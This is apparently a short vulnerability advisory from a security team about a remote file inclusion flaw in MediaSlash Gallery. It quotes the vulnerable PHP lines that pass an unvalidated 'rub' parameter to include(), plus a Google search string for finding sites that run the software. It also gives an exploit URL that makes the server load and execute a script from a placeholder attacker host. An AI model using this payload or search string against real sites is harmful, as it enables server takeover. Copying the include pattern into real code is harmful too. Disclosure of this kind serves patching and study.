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MediaSlash Gallery 'rub' variable Remote File inlcusion Vulnerability

author: [Moroccan Security Team]
Vendor: www.MediaSlash.com
Vendor Contacted
greetz to : [Moroccan Security Team] CiM-TeaM and All Freinds
Google : Powered by MediaSlash.com

MediaSlash Galleryis is vulnerable to remote URL inclusion vulnerability
This flaw is due to an input validation error in the "index.php"(line 489)
script that does not validate the "rub" variable,remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web 
27 .            $rub = @$_GET["rub"];
57 .            $page_menu = ''.$rub.'/index.php';
489.            <? include($page_menu); ?> //!!!!!!!!

Exploit http://[trajet]/[path]/index.php?rub=http://[attacker]

http://[attacker]/index.php will be included and executed withe
the privileges of the web server

Simo64 Moroccan Security Team :) simo64[at]gmail[dot]com